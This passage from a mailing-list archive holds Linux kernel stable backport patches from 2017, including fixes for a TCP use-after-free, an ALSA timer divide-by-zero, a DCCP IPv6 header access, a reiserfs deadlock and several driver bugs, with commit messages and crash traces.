case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
-#endif
default:
barrier();
__builtin_memcpy((void *)res, (const void *)p, size);
- data_access_exceeds_word_size();
barrier();
}
}
@@ -214,13 +201,10 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
-#ifdef CONFIG_64BIT
case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
-#endif
default:
barrier();
__builtin_memcpy((void *)p, (const void *)res, size);
- data_access_exceeds_word_size();
barrier();
}
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:01 UTC
Permalink
From: Anoob Soman <***@citrix.com>

commit 6664498280cf17a59c3e7cf1a931444c02633ed1 upstream.

If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()

Signed-off-by: Anoob Soman <***@citrix.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/packet/af_packet.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
index 2d454a2..24f0066 100644
--- a/net/packet/af_packet.c
+++ b/net/packet/af_packet.c
@@ -3384,6 +3384,7 @@ static int packet_notifier(struct notifier_block *this, unsigned long msg, void
}
if (msg == NETDEV_UNREGISTER) {
packet_cached_dev_reset(po);
+ fanout_release(sk);
po->ifindex = -1;
if (po->prot_hook.dev)
dev_put(po->prot_hook.dev);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Dan Carpenter <***@oracle.com>

commit 2d6a4d64812bb12dda53704943b61a7496d02098 upstream.

The curly braces are missing here so we print stuff unintentionally.

Fixes: 9da4714a2d44 ('slub: slabinfo update for cmpxchg handling')
Link: http://lkml.kernel.org/r/***@mwanda
Signed-off-by: Dan Carpenter <***@oracle.com>
Acked-by: Christoph Lameter <***@linux.com>
Cc: Sergey Senozhatsky <***@gmail.com>
Cc: Colin Ian King <***@canonical.com>
Cc: Laura Abbott <***@fedoraproject.org>
Signed-off-by: Andrew Morton <***@linux-foundation.org>
Signed-off-by: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
tools/vm/slabinfo.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/tools/vm/slabinfo.c b/tools/vm/slabinfo.c
index 808d5a9..bcc6125 100644
--- a/tools/vm/slabinfo.c
+++ b/tools/vm/slabinfo.c
@@ -493,10 +493,11 @@ static void slab_stats(struct slabinfo *s)
s->alloc_node_mismatch, (s->alloc_node_mismatch * 100) / total);
}

- if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail)
+ if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail) {
printf("\nCmpxchg_double Looping\n------------------------\n");
printf("Locked Cmpxchg Double redos %lu\nUnlocked Cmpxchg Double redos %lu\n",
s->cmpxchg_double_fail, s->cmpxchg_double_cpu_fail);
+ }
}

static void report(struct slabinfo *s)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Bart Van Assche <***@sandisk.com>

commit 51093254bf879bc9ce96590400a87897c7498463 upstream.

Let the target core check task existence instead of the SRP target
driver. Additionally, let the target core check the validity of the
task management request instead of the ib_srpt driver.

This patch fixes the following kernel crash:

BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
Oops: 0002 [#1] SMP
Call Trace:
[<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
[<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
[<ffffffff8109726f>] kthread+0xcf/0xe0
[<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0

Signed-off-by: Bart Van Assche <***@sandisk.com>
Fixes: 3e4f574857ee ("ib_srpt: Convert TMR path to target_submit_tmr")
Tested-by: Alex Estrin <***@intel.com>
Reviewed-by: Christoph Hellwig <***@lst.de>
Cc: Nicholas Bellinger <***@linux-iscsi.org>
Cc: Sagi Grimberg <***@mellanox.com>
Cc: stable <***@vger.kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/ulp/srpt/ib_srpt.c | 59 +----------------------------------
1 file changed, 1 insertion(+), 58 deletions(-)

diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
index fcf9f87..1e79114 100644
--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
+++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
@@ -1754,47 +1754,6 @@ send_sense:
return -1;
}

-/**
- * srpt_rx_mgmt_fn_tag() - Process a task management function by tag.
- * @ch: RDMA channel of the task management request.
- * @fn: Task management function to perform.
- * @req_tag: Tag of the SRP task management request.
- * @mgmt_ioctx: I/O context of the task management request.
- *
- * Returns zero if the target core will process the task management
- * request asynchronously.
- *
- * Note: It is assumed that the initiator serializes tag-based task management
- * requests.
- */
-static int srpt_rx_mgmt_fn_tag(struct srpt_send_ioctx *ioctx, u64 tag)
-{
- struct srpt_device *sdev;
- struct srpt_rdma_ch *ch;
- struct srpt_send_ioctx *target;
- int ret, i;
-
- ret = -EINVAL;
- ch = ioctx->ch;
- BUG_ON(!ch);
- BUG_ON(!ch->sport);
- sdev = ch->sport->sdev;
- BUG_ON(!sdev);
- spin_lock_irq(&sdev->spinlock);
- for (i = 0; i < ch->rq_size; ++i) {
- target = ch->ioctx_ring[i];
- if (target->cmd.se_lun == ioctx->cmd.se_lun &&
- target->tag == tag &&
- srpt_get_cmd_state(target) != SRPT_STATE_DONE) {
- ret = 0;
- /* now let the target core abort &target->cmd; */
- break;
- }
- }
- spin_unlock_irq(&sdev->spinlock);
- return ret;
-}
-
static int srp_tmr_to_tcm(int fn)
{
switch (fn) {
@@ -1829,7 +1788,6 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
struct se_cmd *cmd;
struct se_session *sess = ch->sess;
uint64_t unpacked_lun;
- uint32_t tag = 0;
int tcm_tmr;
int rc;

@@ -1845,25 +1803,10 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
srpt_set_cmd_state(send_ioctx, SRPT_STATE_MGMT);
send_ioctx->tag = srp_tsk->tag;
tcm_tmr = srp_tmr_to_tcm(srp_tsk->tsk_mgmt_func);
- if (tcm_tmr < 0) {
- send_ioctx->cmd.se_tmr_req->response =
- TMR_TASK_MGMT_FUNCTION_NOT_SUPPORTED;
- goto fail;
- }
unpacked_lun = srpt_unpack_lun((uint8_t *)&srp_tsk->lun,
sizeof(srp_tsk->lun));
-
- if (srp_tsk->tsk_mgmt_func == SRP_TSK_ABORT_TASK) {
- rc = srpt_rx_mgmt_fn_tag(send_ioctx, srp_tsk->task_tag);
- if (rc < 0) {
- send_ioctx->cmd.se_tmr_req->response =
- TMR_TASK_DOES_NOT_EXIST;
- goto fail;
- }
- tag = srp_tsk->task_tag;
- }
rc = target_submit_tmr(&send_ioctx->cmd, sess, NULL, unpacked_lun,
- srp_tsk, tcm_tmr, GFP_KERNEL, tag,
+ srp_tsk, tcm_tmr, GFP_KERNEL, srp_tsk->task_tag,
TARGET_SCF_ACK_KREF);
if (rc != 0) {
send_ioctx->cmd.se_tmr_req->response = TMR_FUNCTION_REJECTED;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Bart Van Assche <***@sandisk.com>

commit 3b785fbcf81c3533772c52b717f77293099498d3 upstream.

This avoids that new requests are queued while __dm_destroy() is in
progress.

[js] use md->queue instead of non-present helper

Signed-off-by: Bart Van Assche <***@sandisk.com>
Signed-off-by: Mike Snitzer <***@redhat.com>
Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/md/dm.c | 5 +++++
1 file changed, 5 insertions(+)

diff --git a/drivers/md/dm.c b/drivers/md/dm.c
index f69fed8..a77ef6c 100644
--- a/drivers/md/dm.c
+++ b/drivers/md/dm.c
@@ -2323,6 +2323,7 @@ EXPORT_SYMBOL_GPL(dm_device_name);

static void __dm_destroy(struct mapped_device *md, bool wait)
{
+ struct request_queue *q = md->queue;
struct dm_table *map;

might_sleep();
@@ -2333,6 +2334,10 @@ static void __dm_destroy(struct mapped_device *md, bool wait)
set_bit(DMF_FREEING, &md->flags);
spin_unlock(&_minor_lock);

+ spin_lock_irq(q->queue_lock);
+ queue_flag_set(QUEUE_FLAG_DYING, q);
+ spin_unlock_irq(q->queue_lock);
+
/*
* Take suspend_lock so that presuspend and postsuspend methods
* do not race with internal suspend.
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit ffb4d6c8508657824bcef68a36b2a0f9d8c09d10 upstream.

If a TCP socket gets a large write queue, an overflow can happen
in a test in __tcp_retransmit_skb() preventing all retransmits.

The flow then stalls and resets after timeouts.

Tested:

sysctl -w net.core.wmem_max=1000000000
netperf -H dest -- -s 1000000000

Signed-off-by: Eric Dumazet <***@google.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/ipv4/tcp_output.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 276b283..465285b 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -2327,7 +2327,8 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb)
* copying overhead: fragmentation, tunneling, mangling etc.
*/
if (atomic_read(&sk->sk_wmem_alloc) >
- min(sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), sk->sk_sndbuf))
+ min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2),
+ sk->sk_sndbuf))
return -EAGAIN;

if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Vegard Nossum <***@oracle.com>

commit 6b760bb2c63a9e322c0e4a0b5daf335ad93d5a33 upstream.

I got this:

divide error: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #189
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff8801120a9580 task.stack: ffff8801120b0000
RIP: 0010:[<ffffffff82c8bd9a>] [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
RSP: 0018:ffff88011aa87da8 EFLAGS: 00010006
RAX: 0000000000004f76 RBX: ffff880112655e88 RCX: 0000000000000000
RDX: 0000000000000000 RSI: ffff880112655ea0 RDI: 0000000000000001
RBP: ffff88011aa87e00 R08: ffff88013fff905c R09: ffff88013fff9048
R10: ffff88013fff9050 R11: 00000001050a7b8c R12: ffff880114778a00
R13: ffff880114778ab4 R14: ffff880114778b30 R15: 0000000000000000
FS: 00007f071647c700(0000) GS:ffff88011aa80000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000603001 CR3: 0000000112021000 CR4: 00000000000006e0
Stack:
0000000000000000 ffff880114778ab8 ffff880112655ea0 0000000000004f76
ffff880112655ec8 ffff880112655e80 ffff880112655e88 ffff88011aa98fc0
00000000b97ccf2b dffffc0000000000 ffff88011aa98fc0 ffff88011aa87ef0
Call Trace:
<IRQ>
[<ffffffff813abce7>] __hrtimer_run_queues+0x347/0xa00
[<ffffffff82c8bbc0>] ? snd_hrtimer_close+0x130/0x130
[<ffffffff813ab9a0>] ? retrigger_next_event+0x1b0/0x1b0
[<ffffffff813ae1a6>] ? hrtimer_interrupt+0x136/0x4b0
[<ffffffff813ae220>] hrtimer_interrupt+0x1b0/0x4b0
[<ffffffff8120f91e>] local_apic_timer_interrupt+0x6e/0xf0
[<ffffffff81227ad3>] ? kvm_guest_apic_eoi_write+0x13/0xc0
[<ffffffff83c35086>] smp_apic_timer_interrupt+0x76/0xa0
[<ffffffff83c3416c>] apic_timer_interrupt+0x8c/0xa0
<EOI>
[<ffffffff83c3239c>] ? _raw_spin_unlock_irqrestore+0x2c/0x60
[<ffffffff82c8185d>] snd_timer_start1+0xdd/0x670
[<ffffffff82c87015>] snd_timer_continue+0x45/0x80
[<ffffffff82c88100>] snd_timer_user_ioctl+0x1030/0x2830
[<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
[<ffffffff815aa4f8>] ? handle_mm_fault+0xbc8/0x27f0
[<ffffffff815a9930>] ? __pmd_alloc+0x370/0x370
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
[<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
[<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
[<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
[<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
[<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
[<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
[<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
[<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
[<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
[<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
Code: e8 fc 42 7b fe 8b 0d 06 8a 50 03 49 0f af cf 48 85 c9 0f 88 7c 01 00 00 48 89 4d a8 e8 e0 42 7b fe 48 8b 45 c0 48 8b 4d a8 48 99 <48> f7 f9 49 01 c7 e8 cb 42 7b fe 48 8b 55 d0 48 b8 00 00 00 00
RIP [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
RSP <ffff88011aa87da8>
---[ end trace 6aa380f756a21074 ]---

The problem happens when you call ioctl(SNDRV_TIMER_IOCTL_CONTINUE) on a
completely new/unused timer -- it will have ->sticks == 0, which causes a
divide by 0 in snd_hrtimer_callback().

Signed-off-by: Vegard Nossum <***@oracle.com>
Signed-off-by: Takashi Iwai <***@suse.de>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
sound/core/timer.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f5ddc9b..f297eac 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -817,6 +817,7 @@ int snd_timer_new(struct snd_card *card, char *id, struct snd_timer_id *tid,
timer->tmr_subdevice = tid->subdevice;
if (id)
strlcpy(timer->id, id, sizeof(timer->id));
+ timer->sticks = 1;
INIT_LIST_HEAD(&timer->device_list);
INIT_LIST_HEAD(&timer->open_list_head);
INIT_LIST_HEAD(&timer->active_list_head);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 upstream.

dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.

Signed-off-by: Eric Dumazet <***@google.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/dccp/ipv6.c | 15 ++++++++-------
1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index 6cf9f77..fb72107 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -83,7 +83,7 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
u8 type, u8 code, int offset, __be32 info)
{
const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data;
- const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+ const struct dccp_hdr *dh;
struct dccp_sock *dp;
struct ipv6_pinfo *np;
struct sock *sk;
@@ -91,12 +91,13 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
__u64 seq;
struct net *net = dev_net(skb->dev);

- if (skb->len < offset + sizeof(*dh) ||
- skb->len < offset + __dccp_basic_hdr_len(dh)) {
- ICMP6_INC_STATS_BH(net, __in6_dev_get(skb->dev),
- ICMP6_MIB_INERRORS);
- return;
- }
+ /* Only need dccph_dport & dccph_sport which are the first
+ * 4 bytes in dccp header.
+ * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
+ */
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+ dh = (struct dccp_hdr *)(skb->data + offset);

sk = inet6_lookup(net, &dccp_hashinfo,
&hdr->daddr, dh->dccph_dport,
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit bb1fceca22492109be12640d49f5ea5a544c6bb4 upstream.

When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
tail of the write queue using tcp_add_write_queue_tail()

Then it attempts to copy user data into this fresh skb.

If the copy fails, we undo the work and remove the fresh skb.

Unfortunately, this undo lacks the change done to tp->highest_sack and
we can leave a dangling pointer (to a freed skb)

Later, tcp_xmit_retransmit_queue() can dereference this pointer and
access freed memory. For regular kernels where memory is not unmapped,
this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
returning garbage instead of tp->snd_nxt, but with various debug
features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.

This bug was found by Marco Grassi thanks to syzkaller.

Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
Reported-by: Marco Grassi <***@gmail.com>
Signed-off-by: Eric Dumazet <***@google.com>
Cc: Ilpo Järvinen <***@helsinki.fi>
Cc: Yuchung Cheng <***@google.com>
Cc: Neal Cardwell <***@google.com>
Acked-by: Neal Cardwell <***@google.com>
Reviewed-by: Cong Wang <***@gmail.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/net/tcp.h | 2 ++
1 file changed, 2 insertions(+)

diff --git a/include/net/tcp.h b/include/net/tcp.h
index 29a1a63..1c5e037 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1392,6 +1392,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
{
if (sk->sk_send_head == skb_unlinked)
sk->sk_send_head = NULL;
+ if (tcp_sk(sk)->highest_sack == skb_unlinked)
+ tcp_sk(sk)->highest_sack = NULL;
}

static inline void tcp_init_send_head(struct sock *sk)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Mike Galbraith <***@gmx.de>

commit 420902c9d086848a7548c83e0a49021514bd71b7 upstream.

If we hold the superblock lock while calling reiserfs_quota_on_mount(), we can
deadlock our own worker - mount blocks kworker/3:2, sleeps forever more.

crash> ps|grep UN
715 2 3 ffff880220734d30 UN 0.0 0 0 [kworker/3:2]
9369 9341 2 ffff88021ffb7560 UN 1.3 493404 123184 Xorg
9665 9664 3 ffff880225b92ab0 UN 0.0 47368 812 udisks-daemon
10635 10403 3 ffff880222f22c70 UN 0.0 14904 936 mount
crash> bt ffff880220734d30
PID: 715 TASK: ffff880220734d30 CPU: 3 COMMAND: "kworker/3:2"
#0 [ffff8802244c3c20] schedule at ffffffff8144584b
#1 [ffff8802244c3cc8] __rt_mutex_slowlock at ffffffff814472b3
#2 [ffff8802244c3d28] rt_mutex_slowlock at ffffffff814473f5
#3 [ffff8802244c3dc8] reiserfs_write_lock at ffffffffa05f28fd [reiserfs]
#4 [ffff8802244c3de8] flush_async_commits at ffffffffa05ec91d [reiserfs]
#5 [ffff8802244c3e08] process_one_work at ffffffff81073726
#6 [ffff8802244c3e68] worker_thread at ffffffff81073eba
#7 [ffff8802244c3ec8] kthread at ffffffff810782e0
#8 [ffff8802244c3f48] kernel_thread_helper at ffffffff81450064
crash> rd ffff8802244c3cc8 10
ffff8802244c3cc8: ffffffff814472b3 ffff880222f23250 .rD.....P2."....
ffff8802244c3cd8: 0000000000000000 0000000000000286 ................
ffff8802244c3ce8: ffff8802244c3d30 ffff880220734d80 0=L$.....Ms ....
ffff8802244c3cf8: ffff880222e8f628 0000000000000000 (.."............
ffff8802244c3d08: 0000000000000000 0000000000000002 ................
crash> struct rt_mutex ffff880222e8f628
struct rt_mutex {
wait_lock = {
raw_lock = {
slock = 65537
}
},
wait_list = {
node_list = {
next = 0xffff8802244c3d48,
prev = 0xffff8802244c3d48
}
},
owner = 0xffff880222f22c71,
save_state = 0
}
crash> bt 0xffff880222f22c70
PID: 10635 TASK: ffff880222f22c70 CPU: 3 COMMAND: "mount"
#0 [ffff8802216a9868] schedule at ffffffff8144584b
#1 [ffff8802216a9910] schedule_timeout at ffffffff81446865
#2 [ffff8802216a99a0] wait_for_common at ffffffff81445f74
#3 [ffff8802216a9a30] flush_work at ffffffff810712d3
#4 [ffff8802216a9ab0] schedule_on_each_cpu at ffffffff81074463
#5 [ffff8802216a9ae0] invalidate_bdev at ffffffff81178aba
#6 [ffff8802216a9af0] vfs_load_quota_inode at ffffffff811a3632
#7 [ffff8802216a9b50] dquot_quota_on_mount at ffffffff811a375c
#8 [ffff8802216a9b80] finish_unfinished at ffffffffa05dd8b0 [reiserfs]
#9 [ffff8802216a9cc0] reiserfs_fill_super at ffffffffa05de825 [reiserfs]
RIP: 00007f7b9303997a RSP: 00007ffff443c7a8 RFLAGS: 00010202
RAX: 00000000000000a5 RBX: ffffffff8144ef12 RCX: 00007f7b932e9ee0
RDX: 00007f7b93d9a400 RSI: 00007f7b93d9a3e0 RDI: 00007f7b93d9a3c0
RBP: 00007f7b93d9a2c0 R8: 00007f7b93d9a550 R9: 0000000000000001
R10: ffffffffc0ed040e R11: 0000000000000202 R12: 000000000000040e
R13: 0000000000000000 R14: 00000000c0ed040e R15: 00007ffff443ca20
ORIG_RAX: 00000000000000a5 CS: 0033 SS: 002b

Signed-off-by: Mike Galbraith <***@gmx.de>
Acked-by: Frederic Weisbecker <***@gmail.com>
Acked-by: Mike Galbraith <***@suse.de>
Signed-off-by: Jan Kara <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/reiserfs/super.c | 12 +++++++++++-
1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/super.c b/fs/reiserfs/super.c
index e2e202a..7ff27fa 100644
--- a/fs/reiserfs/super.c
+++ b/fs/reiserfs/super.c
@@ -184,7 +184,15 @@ static int remove_save_link_only(struct super_block *s,
static int reiserfs_quota_on_mount(struct super_block *, int);
#endif

-/* look for uncompleted unlinks and truncates and complete them */
+/*
+ * Look for uncompleted unlinks and truncates and complete them
+ *
+ * Called with superblock write locked. If quotas are enabled, we have to
+ * release/retake lest we call dquot_quota_on_mount(), proceed to
+ * schedule_on_each_cpu() in invalidate_bdev() and deadlock waiting for the per
+ * cpu worklets to complete flush_async_commits() that in turn wait for the
+ * superblock write lock.
+ */
static int finish_unfinished(struct super_block *s)
{
INITIALIZE_PATH(path);
@@ -231,7 +239,9 @@ static int finish_unfinished(struct super_block *s)
quota_enabled[i] = 0;
continue;
}
+ reiserfs_write_unlock(s);
ret = reiserfs_quota_on_mount(s, i);
+ reiserfs_write_lock(s);
if (ret < 0)
reiserfs_warning(s, "reiserfs-2500",
"cannot turn on journaled "
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Felipe Balbi <***@linux.intel.com>

commit 6c83f77278f17a7679001027e9231291c20f0d8a upstream.

If we don't guarantee that we will always get an
interrupt at least when we're queueing our very last
request, we could fall into situation where we queue
every request with 'no_interrupt' set. This will
cause the link to get stuck.

The behavior above has been triggered with g_ether
and dwc3.

Reported-by: Ville Syrjälä <***@linux.intel.com>
Signed-off-by: Felipe Balbi <***@linux.intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/gadget/u_ether.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index 4b76124..aad066d 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -586,8 +586,9 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,

/* throttle high/super speed IRQ rate back slightly */
if (gadget_is_dualspeed(dev->gadget))
- req->no_interrupt = (dev->gadget->speed == USB_SPEED_HIGH ||
- dev->gadget->speed == USB_SPEED_SUPER)
+ req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
+ dev->gadget->speed == USB_SPEED_SUPER)) &&
+ !list_empty(&dev->tx_reqs))
? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
: 0;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Ching Huang <***@areca.com.tw>

commit 2bf7dc8443e113844d078fd6541b7f4aa544f92f upstream.

The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller
firmware. Depending on how drive caches are handled internally by
controller firmware this could potentially lead to data integrity
problems.

Ensure that cache flushes are passed to the controller.

[mkp: applied by hand and removed unused vars]

Signed-off-by: Ching Huang <***@areca.com.tw>
Reported-by: Tomas Henzl <***@redhat.com>
Signed-off-by: Martin K. Petersen <***@oracle.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/scsi/arcmsr/arcmsr_hba.c | 9 ---------
1 file changed, 9 deletions(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 66dda86..8d9477c 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -2069,18 +2069,9 @@ static int arcmsr_queue_command_lck(struct scsi_cmnd *cmd,
struct AdapterControlBlock *acb = (struct AdapterControlBlock *) host->hostdata;
struct CommandControlBlock *ccb;
int target = cmd->device->id;
- int lun = cmd->device->lun;
- uint8_t scsicmd = cmd->cmnd[0];
cmd->scsi_done = done;
cmd->host_scribble = NULL;
cmd->result = 0;
- if ((scsicmd == SYNCHRONIZE_CACHE) ||(scsicmd == SEND_DIAGNOSTIC)){
- if(acb->devstate[target][lun] == ARECA_RAID_GONE) {
- cmd->result = (DID_NO_CONNECT << 16);
- }
- cmd->scsi_done(cmd);
- return 0;
- }
if (target == 16) {
/* virtual device for iop message transfer */
arcmsr_handle_virtual_command(acb, cmd);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Markus Elfring <***@users.sourceforge.net>

commit 5f0163a5ee9cc7c59751768bdfd94a73186debba upstream.

The put_device() function tests whether its argument is NULL and then
returns immediately. Thus the test around the call is not needed.

This issue was detected by using the Coccinelle software.

Signed-off-by: Markus Elfring <***@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <***@linuxfoundation.org>
[wt: backported only to ease next patch as suggested by Jiri]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/base/core.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index 2a19097..d92ecf3 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -1138,8 +1138,7 @@ done:
kobject_del(&dev->kobj);
Error:
cleanup_device_parent(dev);
- if (parent)
- put_device(parent);
+ put_device(parent);
name_error:
kfree(dev->p);
dev->p = NULL;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:02 UTC
Permalink
From: Sergei Miroshnichenko <***@emcraft.com>

commit 9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream.

A timer was used to restart after the bus-off state, leading to a
relatively large can_restart() executed in an interrupt context,
which in turn sets up pinctrl. When this happens during system boot,
there is a high probability of grabbing the pinctrl_list_mutex,
which is locked already by the probe() of other device, making the
kernel suspect a deadlock condition [1].

To resolve this issue, the restart_timer is replaced by a delayed
work.

[1] https://github.com/victronenergy/venus/issues/24

Signed-off-by: Sergei Miroshnichenko <***@emcraft.com>
Signed-off-by: Marc Kleine-Budde <***@pengutronix.de>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/net/can/dev.c | 27 +++++++++++++++++----------
include/linux/can/dev.h | 3 ++-
2 files changed, 19 insertions(+), 11 deletions(-)

diff --git a/drivers/net/can/dev.c b/drivers/net/can/dev.c
index 464e5f6..284d751 100644
--- a/drivers/net/can/dev.c
+++ b/drivers/net/can/dev.c
@@ -22,6 +22,7 @@
